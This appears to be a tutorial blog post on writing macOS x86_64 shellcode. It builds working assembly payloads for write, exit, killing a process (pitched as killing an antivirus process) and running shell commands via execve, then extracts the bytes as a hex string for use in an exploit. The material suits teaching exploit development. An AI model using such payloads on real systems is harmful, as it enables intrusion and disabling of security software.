macOS: Shellcoding on Apples (x86_64)
Introduction
This guide explores shellcoding on the x86_64 architecture for macOS. We skip the traditional x86 starting point for a practical reason: with the release of macOS 10.15 (Catalina), Apple dropped support for 32-bit applications entirely, so 64-bit shellcode is the only kind that makes sense on modern macOS systems. Before diving in, you’ll need at least a basic understanding of assembly language. This isn’t an assembly tutorial, so if you’re unfamiliar with the fundamentals, take some time to learn them first and return when you’re ready for the challenge.
Rather than jumping straight into cryptic assembly instructions, this guide follows a practical workflow: write the code in C, identify the necessary system calls, and then translate everything into assembly. This approach leverages the wealth of existing C documentation and resources, which makes the process significantly more manageable. You’ll find countless examples of how to build network clients, manipulate processes, or execute commands in C, but you’d be hard-pressed to find someone talking about implementing these same tasks purely in assembly. Let’s get started.
You can find all the code on my github: https://github.com/Zeyad-Azima/macOShellcoding
Lab Setup
Let’s set up our lab. We need the following tools:
- Homebrew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
- Xcode:
We can download it from the `App Store` or from https://xcodereleases.com
- Xcode Command Line Tools (CLT)
xcode-select --install
- Nasm
brew install nasm
- Binutils (`ld`)
brew install binutils
Before we go straight to shellcoding, we need to understand some fundamentals that we will rely on when writing shellcode. The macOS kernel (XNU) is a hybrid kernel that combines Mach with a BSD layer. We need to download the XNU source code, because we will use it as a reference for understanding syscalls on macOS and for building our shellcode. We can download it from here.
Now, we need the source code version that matches the macOS release you are writing the shellcode for. I am on macOS Sequoia, version 15.5. You can use the `sw_vers` command to check yours.
~ % sw_vers
ProductName: macOS
ProductVersion: 15.5
BuildVersion: 24F74
Now, let’s download the matching XNU version.
When we scroll down more we can find it.
That’s the version (xnu-11417.121.6) of macOS 15.5.
XNU Syscall Classes
Now, let’s open it with VSCode or your favorite IDE/code editor.
The tree contains the whole kernel. We only need a few of these files to understand the basics, but while writing our shellcode we will navigate through many different files and folders. First, let’s go to osfmk/mach/i386/syscall_sw.h.
Lines 135 to 152 are what matter to us. As mentioned before, XNU is a hybrid kernel, so if you want to execute a BSD syscall you need to select the BSD entry (class) for it.
#define SYSCALL_CLASS_SHIFT 24
#define SYSCALL_CLASS_MASK (0xFF << SYSCALL_CLASS_SHIFT)
#define SYSCALL_NUMBER_MASK (~SYSCALL_CLASS_MASK)
......
#define SYSCALL_CLASS_NONE 0 /* Invalid */
#define SYSCALL_CLASS_MACH 1 /* Mach */
#define SYSCALL_CLASS_UNIX 2 /* Unix/BSD */
#define SYSCALL_CLASS_MDEP 3 /* Machine-dependent */
#define SYSCALL_CLASS_DIAG 4 /* Diagnostics */
#define SYSCALL_CLASS_IPC 5 /* Mach IPC */
In XNU (the kernel underlying macOS, iOS, etc.), system calls are not uniformly accessed via a single syscall table like in Linux. Instead, XNU uses syscall classes to route calls through different subsystems. Each system call class is associated with a unique number, which is shifted left by 24 bits (defined by SYSCALL_CLASS_SHIFT) to determine its class. So for every class to get the entry it will be as the following:
| Class | Name | Value | Shifted Base (<< 24) | Description |
|---|---|---|---|---|
| 0 | SYSCALL_CLASS_NONE | 0 | 0x00000000 | Invalid |
| 1 | SYSCALL_CLASS_MACH | 1 | 0x01000000 | Mach traps |
| 2 | SYSCALL_CLASS_UNIX | 2 | 0x02000000 | BSD syscalls |
| 3 | SYSCALL_CLASS_MDEP | 3 | 0x03000000 | Machine-dependent |
| 4 | SYSCALL_CLASS_DIAG | 4 | 0x04000000 | Diagnostics |
| 5 | SYSCALL_CLASS_IPC | 5 | 0x05000000 | Mach IPC (newer) |
BSD = 0x02 << 24 = 0x02000000 → 0x2000000
The SYSCALL_CLASS_MASK and SYSCALL_NUMBER_MASK are used to extract the class and syscall number respectively. For example, a traditional BSD system call such as execve (system call number 59 or 0x3b in hex) in the SYSCALL_CLASS_UNIX (number 2) would be represented as 0x200003b when passed to the syscall assembly instruction.
; Assembly example to make a syscall with execve (BSD) in macOS
mov rax, 0x200003b ; Load the syscall number for execve (59 with class mask)
mov rdi, address ; Address of the command to execute
mov rsi, argv ; Pointer to an array of arguments
mov rdx, envp ; Pointer to an array of environment variables
syscall ; Make the system call
To make it clear, imagine you’re dining in the XNU restaurant, a multi-level establishment where each floor represents a different system call class, and the kitchen routes your order based on a cleverly encoded ticket. The first floor, SYSCALL_CLASS_MACH (class 1), serves hearty main courses like task and thread operations, while the second floor, SYSCALL_CLASS_UNIX (class 2), specializes in classic BSD desserts such as execve and write. To order a medium-rare steak (item number 0x3B, or 59, on the Mach floor) you must tell the waiter 0x0100003B, calculated as (1 << 24) | 0x3B. Craving tiramisu (execve, also #59) from the BSD floor? Your order becomes 0x0200003B: same dish number, different floor, computed as (2 << 24) | 0x3B. Just like in XNU, never shout just “59”. The kitchen needs the full encoded number with the class shifted 24 bits left, so that your steak doesn’t arrive as a dessert (and vice versa). Bon appétit in the kernel!
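The class arithmetic can also be sketched in C. This is only an illustration: the constants are copied from the syscall_sw.h excerpt quoted earlier, while the helper names (`xnu_syscall_encode`, `xnu_syscall_class`, `xnu_syscall_number`) are made up for this post and do not exist in XNU. I also write the mask with `0xFFu` so the shift stays unsigned.

```c
#include <stdint.h>

/* Constants copied from osfmk/mach/i386/syscall_sw.h (0xFFu is my tweak). */
#define SYSCALL_CLASS_SHIFT 24
#define SYSCALL_CLASS_MASK  (0xFFu << SYSCALL_CLASS_SHIFT)
#define SYSCALL_NUMBER_MASK (~SYSCALL_CLASS_MASK)
#define SYSCALL_CLASS_MACH  1
#define SYSCALL_CLASS_UNIX  2

/* Hypothetical helper: build the value that is loaded into RAX. */
uint32_t xnu_syscall_encode(uint32_t syscall_class, uint32_t number)
{
    return (syscall_class << SYSCALL_CLASS_SHIFT) | (number & SYSCALL_NUMBER_MASK);
}

/* Hypothetical helper: recover the class (the top 8 bits). */
uint32_t xnu_syscall_class(uint32_t encoded)
{
    return (encoded & SYSCALL_CLASS_MASK) >> SYSCALL_CLASS_SHIFT;
}

/* Hypothetical helper: recover the syscall number (the low 24 bits). */
uint32_t xnu_syscall_number(uint32_t encoded)
{
    return encoded & SYSCALL_NUMBER_MASK;
}
```

For example, `xnu_syscall_encode(SYSCALL_CLASS_UNIX, 59)` gives 0x200003b, the value we load into RAX for execve.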
x86_64 Calling Conventions and Registers
In the System V AMD64 ABI used by macOS on x86-64, function arguments are passed in registers in this order: RDI holds the 1st argument, RSI the 2nd, RDX the 3rd (and sometimes the 2nd return value), RCX the 4th, R8 the 5th, and R9 the 6th. If a function requires more than six arguments, the additional arguments are passed on the stack. The return value comes back in RAX. System calls use the same registers with two differences: the syscall number goes into RAX, and the 4th argument goes into R10 instead of RCX, because the syscall instruction itself overwrites RCX and R11.
RIP points to the next instruction, RSP manages the stack, RBP serves as the frame pointer for stack frames, and RBX is a general-purpose register that is preserved across calls. RSP must be 16-byte aligned before any function call. System calls often work without strict alignment, but keeping the stack aligned is good practice to avoid unexpected behavior. To illustrate how these registers are used, consider a system call that takes three arguments.
; Assume arg1, arg2, and arg3 are already set with appropriate values
mov rax, syscall_number
mov rdi, arg1 ; 1st argument
mov rsi, arg2 ; 2nd argument
mov rdx, arg3 ; 3rd argument
syscall ; Execute syscall
Calling Conventions Table
You can use this table as a reference.
| Register | Usage |
|---|---|
| RDI | 1st function argument |
| RSI | 2nd function argument |
| RDX | 3rd function argument (and optionally the 2nd return value) |
| RCX | 4th function argument (system calls use R10 instead) |
| R8 | 5th function argument |
| R9 | 6th function argument |
| RAX | Function return value / syscall number |
| RIP | Instruction pointer |
| RSP | Stack pointer (must be 16-byte aligned before calls) |
| RBP | Frame pointer |
| RBX | Base register (general purpose, preserved across calls) |
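One detail worth keeping in mind when you move from function calls to raw syscalls is the 4th argument: the `syscall` instruction overwrites RCX (and R11), so the kernel interface takes that argument in R10. The lookup below is just a memory aid written as C; the function name `arg_register` is hypothetical and not part of any library.

```c
#include <stddef.h>

/* Integer/pointer argument registers for ordinary function calls. */
static const char *const FUNCTION_ARG_REGS[6] = {
    "rdi", "rsi", "rdx", "rcx", "r8", "r9"
};

/* Same order for the `syscall` instruction, except that slot 4 is r10. */
static const char *const SYSCALL_ARG_REGS[6] = {
    "rdi", "rsi", "rdx", "r10", "r8", "r9"
};

/* Hypothetical helper: 1-based argument position -> register name.
   Returns NULL for positions that are not passed in registers. */
const char *arg_register(int position, int is_syscall)
{
    if (position < 1 || position > 6) {
        return NULL;
    }
    return is_syscall ? SYSCALL_ARG_REGS[position - 1]
                      : FUNCTION_ARG_REGS[position - 1];
}
```

None of the shellcode in this post needs more than three arguments, so the RCX/R10 difference does not show up in the examples, but it will as soon as you call something like mmap.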
Shellcoding
Before writing our shellcode, let’s make things easy for ourselves. Instead of getting lost in assembly instructions, the best workflow is to write the code in C and then convert it to assembly, since C has plenty of references and resources. For example, you will find people talking about how to write a client/server in C using sockets, but you won’t find someone (“insane”) talking about how to write a client/server in assembly. So the process is as follows:
- Find the `C` functions that we will need in our code.
- Write our code in `C`.
- Turn our code into assembly, which includes:
  - Getting our syscall numbers ready.
  - Function arguments and types.
Let’s go ahead and start with something simple to make things clear.
Print ‘Hello’
We will start by printing Hello to the screen. So let’s apply our workflow. Usually when we want to print something in C, we use the printf() function as follows:
#include <stdio.h>
int main() {
    printf("Hello");
    return 0;
}
Now that we have identified the function we need, printf(), and written our code, the 3rd step is to turn it into assembly. The first thing we need is the syscall number for printf(). All the BSD syscalls are listed in bsd/kern/syscalls.master.
But we won’t find printf() in that file, because printf() is a C library function and not a syscall. Let’s investigate the printf() source code. The implementation of printf() calls a chain of other functions until it reaches the write syscall. (The intermediate names in the table below are mostly glibc internals; Apple’s Libc uses different internal names, but the chain ends at write either way.)
Call Chain: printf → write Syscall
| Step | Function Name |
|---|---|
| 1 | printf |
| 2 | vfprintf |
| 3 | __vfprintf_internal |
| 4 | Xprintf_buffer_write |
| 5 | _IO_new_file_overflow |
| 6 | _IO_do_write |
| 7 | new_do_write |
| 8 | _IO_SYSWRITE |
| 9 | __swrite (macOS only) |
| 10 | write (syscall) |
You can find the source code files here:
You could also just ask ChatGPT or something xD, but keep in mind that for complicated shellcode you will want to read through the code yourself, because you will always learn something and level up.
Now, When we search for write syscall we can see it in the syscalls.master file:
As we see, the write syscall number is 4, and write takes 3 arguments. We need to learn about these arguments and how to use them, which can simply be done by searching or by going to the documentation:
From the description we know that we need to supply the string pointer as the second argument, buf, and the number of bytes (length) as the third argument, nbyte. The first argument, fildes/fd, is the file descriptor. When we look it up, we see that the standard values are:
- 0 (STDIN_FILENO): Represents standard input, typically connected to the keyboard or the input of a pipe.
- 1 (STDOUT_FILENO): Represents standard output, typically connected to the display or the output of a pipe.
- 2 (STDERR_FILENO): Represents standard error, typically connected to the display for error messages.
Our goal here is STDOUT, which is value 1. So our call will be as follows:
#include <unistd.h> // For write()
int main() {
    const char *message = "Hello";
    write(1, message, 5); // fd 1 = stdout, 5 = strlen("Hello")
    return 0;
}
Let’s start with writing our shellcode:
bits 64
global _main
_main:
mov rdi, 1 ; stdout for fd argument
mov rcx, 'Hello' ; put our string value into RCX
push rcx ; We push our string to the stack
mov rsi, rsp ; we supply the pointer to our string from RSP to RSI which is buf argument
mov rdx, 5 ; nbytes argument (our string length)
mov rax, 0x2000004 ; The BSD syscall class entry + syscall number
syscall ; invoke/execute syscall
Here is our shellcode. It starts with bits 64 to select x86-64 mode and global _main to export the entry symbol. The first instruction, mov rdi, 1, loads file descriptor 1 (stdout) into RDI, the first argument register as mentioned before. Next, mov rcx, 'Hello' encodes the 5-character string as the 64-bit immediate 0x6f6c6c6548 into RCX. Because x86 is little-endian, 'H' (0x48) sits in the lowest byte and the three unused high bytes are zero. push rcx then writes these 8 bytes to the stack, placing 'H' at the new stack pointer, followed by the other four characters and three 0x00 bytes that also act as a terminator. Then mov rsi, rsp copies the current stack pointer into RSI, the second argument, so it now points directly at the first character 'H', forming a valid char *buf. mov rdx, 5 sets the third argument, the number of bytes to write, which exactly matches the length of Hello.
Finally, mov rax, 0x2000004 loads the XNU-encoded syscall number (SYSCALL_CLASS_UNIX << 24) | 4, where class 2 routes to the BSD subsystem and 4 selects the write entry from bsd/kern/syscalls.master. The syscall instruction traps into the kernel, which dispatches through XNU’s syscall handler to execute write(1, "Hello", 5), printing Hello to the terminal.
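If you want to double-check what immediate NASM will generate for a short string, the packing is easy to reproduce in C. This is a small sketch under the assumption that the string has at most 8 characters; the function name `pack_string_le` is my own and not part of any toolchain.

```c
#include <stdint.h>
#include <string.h>

/* Pack up to 8 characters into a 64-bit value the way NASM encodes
   `mov rcx, 'Hello'`: first character in the lowest byte, unused
   high bytes left as zero. Characters beyond the 8th are ignored. */
uint64_t pack_string_le(const char *s)
{
    uint64_t value = 0;
    size_t len = strlen(s);
    if (len > 8) {
        len = 8;
    }
    for (size_t i = 0; i < len; i++) {
        value |= (uint64_t)(unsigned char)s[i] << (8 * i);
    }
    return value;
}
```

`pack_string_le("Hello")` evaluates to 0x6f6c6c6548, the same immediate described above, and the zero high bytes are the reason the pushed string is already terminated.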
Let’s save our code into the file hello.asm and build it.
- First, we turn the code into an object file in the `macho64` format using `nasm`:
shellcoding % nasm -f macho64 hello.asm
shellcoding % ls
hello.asm hello.o
As we see, we got our object file hello.o.
- Second, we link it against the required libraries to generate the executable using `ld`:
shellcoding % ld -o hello hello.o -L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/lib -lSystem -platform_version macos 15.5 15.5
ld: warning: no platform load command found in 'hello.o', assuming: macOS
shellcoding % ls
hello hello.asm hello.o
Here we can see that after linking we got our executable.
Note: `-L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/lib` sets the library search path to the macOS 15.5 SDK’s `usr/lib` directory, so the linker can locate `libSystem.tbd`, Apple’s text-based stub format that resolves to `libSystem.dylib` at runtime. The `-lSystem` flag explicitly links against libSystem, the foundational system library that exports `write`, `exit`, and the other BSD/POSIX functions. Our code doesn’t call any of them (the `syscall` instruction is a CPU instruction, not a library symbol), but recent versions of `ld` refuse to produce a dynamically linked executable without it. Finally, `-platform_version macos 15.5 15.5` declares the minimum deployment target and the SDK version as macOS 15.5 (Sequoia) and records them in the executable’s platform load command. The warning in the output appears because the object file produced by `nasm` carries no platform information of its own.
- Let’s run and test our executable:
shellcoding % ./hello
Hellozsh: segmentation fault ./hello
We see that our execution results in a segmentation fault. The reason is that the program never exits: after the write syscall returns, the CPU keeps executing whatever bytes happen to follow our code, and that crashes. In a C program this is handled for us. When main returns (e.g., return 0;), the C runtime calls exit() with that value, which ends in the exit system call (exit_group is the Linux equivalent). This system call terminates the entire process and returns the specified exit status to the operating system. So we need to exit explicitly after executing our write syscall.
Exit
We can exit using exit syscall, as we can see it in the syscalls.master file:
1 AUE_EXIT ALL { void exit(int rval) NO_SYSCALL_STUB; }
The syscall number is 1 and it takes a single integer argument, rval, which is the exit status to return. According to the documentation, rval can be EXIT_SUCCESS (0, successful execution of a program) or EXIT_FAILURE (1, unsuccessful execution of a program). Let’s update our shellcode and add the exit syscall:
bits 64
global _main
_main:
mov rdi, 1 ; stdout for fd argument
mov rcx, 'Hello' ; put our string value into RCX
push rcx ; We push our string to the stack
mov rsi, rsp ; we supply the pointer to our string from RSP to RSI which is buf argument
mov rdx, 5 ; nbytes argument (our string length)
mov rax, 0x2000004 ; The BSD syscall class entry + write syscall number
syscall ; invoke/execute syscall
mov rax, 0x2000001 ; The BSD syscall class entry + exit syscall
mov rdi, 0 ; arg int rval
syscall ; invoke/execute syscall
Now, let’s repeat the process of compiling to get our executable again and test it.
shellcoding % nasm -f macho64 hello.asm
shellcoding % ld -o hello hello.o -L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/lib -lSystem -platform_version macOS 15.5 15.5
ld: warning: no platform load command found in '/Users/zeyadazima.com/shellcoding/hello.o', assuming: macOS
shellcoding % ./hello
Hello%
shellcoding %
As we see clearly our code worked perfectly.
Kill a Process
Let’s write another shellcode. Take a scenario where we found a way to execute code with high privileges and we need shellcode that kills the AV process.
The C code to kill a process is as follows:
#include <stdio.h>
#include <signal.h>
#include <sys/types.h> // For pid_t
#include <unistd.h> // For getpid() (optional, for self-killing example)
int main() {
    pid_t target_pid;
    target_pid = 12345;
    // Sending SIGTERM (graceful termination)
    kill(target_pid, SIGTERM);
    return 0;
}
We can see here that we used the kill function and supplied the PID and the signal, which is SIGTERM.
Now, if we search for kill in syscalls.master, we can find it:
37 AUE_KILL ALL { int kill(int pid, int signum, int posix) NO_SYSCALL_STUB; }
For the PID, we will create a test process and supply its PID as the first argument. For the signum argument, the C code uses SIGTERM, which is a constant defined in the source code. If we search for #define SIGTERM in the XNU source code, we find it at xnu-xnu-11417.121.6/bsd/sys/signal.h:103:
#define SIGKILL 9 /* kill (cannot be caught or ignored) */
#define SIGBUS 10 /* bus error */
#define SIGSEGV 11 /* segmentation violation */
#define SIGSYS 12 /* bad argument to system call */
#define SIGPIPE 13 /* write on a pipe with no one to read it */
#define SIGALRM 14 /* alarm clock */
#define SIGTERM 15 /* software termination signal from kill */
#define SIGURG 16 /* urgent condition on IO channel */
#define SIGSTOP 17 /* sendable stop signal not from tty */
So we can see that the SIGTERM value is 15, but the better option is SIGKILL with value 9, because it forces termination (it cannot be caught or ignored). We will supply 9 as the second argument. Now, the C code has no 3rd argument, but the syscall does. If we search for int posix in the XNU source code, we find the following code under xnu-xnu-11417.121.6/bsd/kern/kern_sig.c:1373:
int
kill(proc_t cp, struct kill_args *uap, __unused int32_t *retval)
{
proc_t p;
kauth_cred_t uc = kauth_cred_get();
int posix = uap->posix; /* !0 if posix behaviour desired */
AUDIT_ARG(pid, uap->pid);
AUDIT_ARG(signum, uap->signum);
if ((u_int)uap->signum >= NSIG) {
return EINVAL;
}
We can see from Apple’s comment in the source code that if we want POSIX behaviour when killing the process, we have to supply anything other than 0. After more searching and asking different AI chatbots, I got the following (treat it as unverified; only the source comment above is authoritative):
| Value | Meaning |
|---|---|
| posix = 0 | Mach (legacy) signal behavior |
| posix = 1 (or any !0) | POSIX/BSD signal behavior |
Note: when a syscall takes an extra argument that does not appear in the `C` code, the libc wrapper is filling it in for us. Such arguments are often flags, and supplying `0` or `NULL` is usually enough for a simple test like ours, but check the kernel source before relying on that.
Let’s run our test process, a simple infinite loop running in the background:
shellcoding % while true; do sleep 10; done &
[2] 27646
shellcoding % ps -p 27646
PID TTY TIME CMD
27646 ttys061 0:00.01 -zsh
The PID is 27646.
Now, let’s write our shellcode:
bits 64
global _main
_main:
mov rdi, 27646 ; 1st argument PID
mov rsi, 9 ; 2nd argument signum
mov rdx, 0 ; 3rd argument posix
mov rax, 0x2000025 ; The BSD syscall class entry + 0x25 (which is 37 in hex) kill syscall
syscall
mov rax, 0x2000001 ; The BSD syscall class entry + exit syscall
mov rdi, 0 ; arg int rval
syscall ; invoke/execute syscall
It’s already clear here: we pass the PID in RDI, then signum in RSI, then posix in RDX, and set up our syscall. Finally, we exit gracefully using the exit syscall.
shellcoding % nasm -f macho64 killer.asm
shellcoding % ld -o killer killer.o -L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/lib -lSystem -platform_version macOS 15.5 15.5
ld: warning: no platform load command found in '/Users/zeyadazima.com/shellcoding/killer.o', assuming: macOS
shellcoding % ./killer
shellcoding %
[2] - killed while true; do; sleep 10; done
shellcoding % ps -p 27646
PID TTY TIME CMD
As we can see clearly, The process has been killed successfully.
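If you would rather test the same idea from C without hard-coding a PID, a sketch like the following works: it forks a throwaway child, sends it SIGKILL, and checks how it died. The function names are hypothetical, and it goes through the libc kill() wrapper, so the third `posix` argument never appears here.

```c
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Spawn a child that only sleeps, so there is a safe PID to aim at. */
pid_t spawn_sleeper(void)
{
    pid_t pid = fork();
    if (pid == 0) {
        for (;;) {
            pause();      /* child: block until a signal arrives */
        }
    }
    return pid;           /* parent: child's PID, or -1 if fork failed */
}

/* Send SIGKILL, reap the child, and return the number of the signal
   that ended it (0 if it exited normally, -1 on error). */
int kill_and_reap(pid_t pid)
{
    int status = 0;
    if (kill(pid, SIGKILL) == -1) {
        return -1;
    }
    if (waitpid(pid, &status, 0) == -1) {
        return -1;
    }
    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}
```

Calling `kill_and_reap(spawn_sleeper())` should return 9, matching the SIGKILL value we found in signal.h.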
Execute Command
Now for the exciting part, where we execute commands. Let’s bring our C code for executing commands on the system. In C this is usually done through the system() function, but remember that XNU has a BSD layer, so let’s look for C code that executes commands using BSD functions.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
    char *const argv[] = {"/bin/ls", "-l", NULL}; // Command and its arguments
    char *const envp[] = {NULL}; // Environment variables (can be customized)
    execve(argv[0], argv, envp);
    perror("execve"); // Only reached if execve fails
    return 1;
}
As we can see, it uses the execve() function, which takes 3 arguments. Let’s search for it in syscalls.master:
59 AUE_EXECVE ALL { int execve(char *fname, char **argp, char **envp) NO_SYSCALL_STUB; }
So it takes a pointer to fname, which is the file name, then a pointer to the array argp and a pointer to another array, envp.
From the description of execve(), the first argument is the path to the binary we want to execute, which in this case is the shell, /bin/zsh. The second argument is the array of arguments for the program, and by convention its first element is the program path itself, /bin/zsh. So if we want to execute the command echo "W00tW00t" > /tmp/Pwned.txt, the array will be {"/bin/zsh", "-c", "echo 'W00tW00t' > /tmp/Pwned.txt", NULL}. The third argument holds the environment. We don’t need one here, so we can supply NULL (or a pointer to an array containing only NULL).
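To see the argv layout in action before moving to assembly, here is a small C sketch that runs `shell -c command` through execve() in a child process and reports the exit status. The function name `run_shell_command` is hypothetical, and passing the shell path as a parameter is my choice so the same code can be tried with /bin/sh as well as /bin/zsh.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run `shell -c command` in a child via execve() and return its exit
   status, or -1 if the child could not be created or was killed. */
int run_shell_command(const char *shell, const char *command)
{
    pid_t pid = fork();
    if (pid < 0) {
        return -1;
    }
    if (pid == 0) {
        /* argv[0] repeats the program path; the array ends with NULL. */
        char *const argv[] = {(char *)shell, "-c", (char *)command, NULL};
        char *const envp[] = {NULL};   /* empty environment */
        execve(shell, argv, envp);
        _exit(127);                    /* reached only if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) == -1) {
        return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The four-element array built in the child is exactly what the shellcode has to reconstruct on the stack: pointer to the path, pointer to "-c", pointer to the command, and a terminating NULL.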
Let’s go on and write our shellcode:
bits 64
global _main
_main:
mov rcx, 0 ; NULL Terminator
push rcx ; push the NULL Terminator to the stack
mov rdx, '/bin/zsh' ; our file/executable name
push rdx ; push the file/executable name to the stack
mov rdi, rsp ; fname => 1st argument: copy RSP, which now points to our file/executable name, into RDI
mov rbx, '-c' ; argp[1] => the 2nd element in the arguments array
push rbx ; push argp[1] to the stack
mov rbx, rsp ; save the argp[1]('-c') pointer to RBX
push rcx ; push the NULL Terminator to the stack
Let’s stop here for a moment. We need to place our 3rd element, the command echo "W00tW00t" > /tmp/Pwned.txt. This string is too long to split into 8-byte pieces and push onto the stack without making our shellcode much longer. Instead, we are going to use a trick to get its address onto the stack, for example:
call array
db 'echo "W00tW00t" > /tmp/Pwned.txt', 0
call pushes its return address, which is the address of the db string that immediately follows it, onto the stack. That gives us a pointer to the string without knowing where the shellcode is loaded.
bits 64
global _main
_main:
xor rcx, rcx ; NULL Terminator
push rcx ; push the NULL Terminator to the stack
mov rdx, '/bin/zsh' ; our file/executable name
push rdx ; push the file/executable name to the stack
mov rdi, rsp ; fname => 1st argument: copy RSP, which now points to our file/executable name, into RDI
mov rbx, '-c' ; argp[1] => the 2nd element in the arguments array
push rbx ; push argp[1] to the stack
mov rbx, rsp ; save the argp[1]('-c') pointer to RBX
push rcx ; push the NULL Terminator to the stack
; classic position-independent trick
call array ; call the array label to setup the array for argp
db 'echo "W00tW00t" > /tmp/Pwned.txt', 0 ; arg[2] which is our command and including the NULL Terminator
Now, we need to write the array label, where we set up the array elements, execute the execve syscall, and then exit.
bits 64
global _main
_main:
xor rcx, rcx ; NULL Terminator
push rcx ; push the NULL Terminator to the stack
mov rdx, '/bin/zsh' ; our file/executable name
push rdx ; push the file/executable name to the stack
mov rdi, rsp ; fname => 1st argument: copy RSP, which now points to our file/executable name, into RDI
mov rbx, '-c' ; argp[1] => the 2nd element in the arguments array
push rbx ; push argp[1] to the stack
mov rbx, rsp ; save the argp[1]('-c') pointer to RBX
push rcx ; push the NULL Terminator to the stack
call array ; call the array label to setup the array for argp
db 'echo "W00tW00t" > /tmp/Pwned.txt', 0 ; arg[2] which is our command and including the NULL Terminator
array:
push rbx ; arg[1] put the -c pointer into the array
push rdi ; args[0] which is fname saved before
mov rsi, rsp ; pass the array pointer for RSI which holds the second argument
xor rdx, rdx ; empty rdx to use as NULL for the third argument envp
mov rax, 0x200003B ; The BSD syscall class entry + 0x3B (which is 59 in hex) execve syscall
syscall ; invoke/execute syscall
mov rax, 0x2000001 ; The BSD syscall class entry + exit syscall
mov rdi, 0 ; arg int rval
syscall ; invoke/execute syscall
Here is our shellcode. It first zeroes RCX with xor rcx, rcx and executes push rcx to place an 8-byte NULL on the stack, which terminates the string pushed next. mov rdx, '/bin/zsh' loads the 8 bytes of the filename into RDX, and push rdx writes them to the stack so that RSP now points at the "/bin/zsh" string. mov rdi, rsp copies that stack pointer into RDI, the first argument to execve (the filename pointer). After that, we load '-c' into RBX and push rbx, creating the "-c" string on the stack (the unused high bytes are zero, so it is already terminated); mov rbx, rsp saves the pointer to the "-c" string in RBX for later. Another push rcx places a NULL on the stack, which becomes the terminator of the argp array.
The call array instruction is the classic position-independent trick: it pushes the address of the immediately following db bytes (the command string) onto the stack and then jumps to the array label, so the command string’s runtime address is already on the stack as argp[2] when array executes. The db 'echo "W00tW00t" > /tmp/Pwned.txt', 0 provides the NUL-terminated command that zsh -c will execute. At the array label we finish building the argp array with push rbx (pointer to "-c") and push rdi (pointer to "/bin/zsh"), then mov rsi, rsp sets RSI to point at that array so execve receives argp correctly. Next, xor rdx, rdx sets RDX = 0 so envp is NULL. mov rax, 0x200003B loads the BSD syscall number for execve.
Note: `0x3B` = 59 decimal → `execve`
Finally, syscall invokes the kernel to execute execve(filename, argv, envp). If execve returns (i.e., it failed), the code falls through to mov rax, 0x2000001 / mov rdi, 0 / syscall, which calls the exit syscall to terminate the process.
shellcoding % nasm -f macho64 execute.asm
shellcoding % ld -o execute execute.o -L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/lib -lSystem -platform_version macOS 15.5 15.5
ld: warning: no platform load command found in '/Users/zeyadazima.com/shellcoding/execute.o', assuming: macOS
shellcoding % ls /tmp
node-compile-cache OSL_PIPE_501_SingleOfficeIPC powerlog
shellcoding % ./execute
shellcoding % ls /tmp
node-compile-cache OSL_PIPE_501_SingleOfficeIPC powerlog Pwned.txt
/tmp % cat Pwned.txt
W00tW00t
We can see clearly that our shellcode executed successfully and our file was created.
Extract Shellcode
Now, let’s extract our shellcode from the object file so that we can ship it with an exploit. We will use the objdump tool and also show how to do it with otool.
objdump
shellcoding% objdump --disassemble --x86-asm-syntax=intel ~/shellcoding/execute.o
execute.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <_main>:
0: 48 31 c9 xor rcx, rcx
3: 51 push rcx
4: 48 ba 2f 62 69 6e 2f 7a 73 68 movabs rdx, 0x68737a2f6e69622f
e: 52 push rdx
f: 48 89 e7 mov rdi, rsp
12: bb 2d 63 00 00 mov ebx, 0x632d
17: 53 push rbx
18: 48 89 e3 mov rbx, rsp
1b: 51 push rcx
1c: e8 21 00 00 00 call 0x42 <array>
21: 65 63 68 6f movsxd ebp, dword ptr gs:[rax + 0x6f]
25: 20 22 and byte ptr [rdx], ah
27: 57 push rdi
28: 30 30 xor byte ptr [rax], dh
2a: 74 57 je 0x83 <array+0x41>
2c: 30 30 xor byte ptr [rax], dh
2e: 74 22 je 0x52 <array+0x10>
30: 20 3e and byte ptr [rsi], bh
32: 20 2f and byte ptr [rdi], ch
34: 74 6d je 0xa3 <array+0x61>
36: 70 2f jo 0x67 <array+0x25>
38: 50 push rax
39: 77 6e ja 0xa9 <array+0x67>
3b: 65 64 2e 74 78 je 0xb8 <array+0x76>
40: 74 00 je 0x42 <array>
0000000000000042 <array>:
42: 53 push rbx
43: 57 push rdi
44: 48 89 e6 mov rsi, rsp
47: 48 31 d2 xor rdx, rdx
4a: b8 3b 00 00 02 mov eax, 0x200003b
4f: 0f 05 syscall
51: b8 01 00 00 02 mov eax, 0x2000001
56: bf 00 00 00 00 mov edi, 0x0
5b: 0f 05 syscall
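- Here we can see our disassembled code clearly, including the array label. The instructions listed between offsets 0x21 and 0x40 are not real code: they are the bytes of our command string, which objdump decodes as if they were instructions. We need to save this output into a file:
objdump --disassemble --x86-asm-syntax=intel ~/shellcoding/execute.o > execute.disasm
- Now, let’s extract the hex bytes from the `execute.disasm` file using command-line utilities.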
shellcoding% grep -E '^[[:space:]]+[0-9a-f]+:' execute.disasm \
| awk '{for(i=2;i<=NF;i++) if ($i ~ /^[0-9a-f]{2}$/) printf "%s", $i}' \
| tr -d '\n' > shellcode.hex
shellcoding% cat shellcode.hex
4831c95148ba2f62696e2f7a7368524889e7bb2d630000534889e351e8210000006563686f2022573030745730307422203e202f746d702f50776e65642e7478740053574889e64831d2b83b0000020f05b801000002bf000000000f05
- Convert it to binary
shellcoding% xxd -r -p shellcode.hex > shellcode.bin
- Let’s Check the Shellcode size
shellcoding% wc -c shellcode.bin
93 shellcode.bin // 93 bytes
- Generate a `C` array of bytes for the shellcode
shellcoding% xxd -i shellcode.bin > shellcode.h
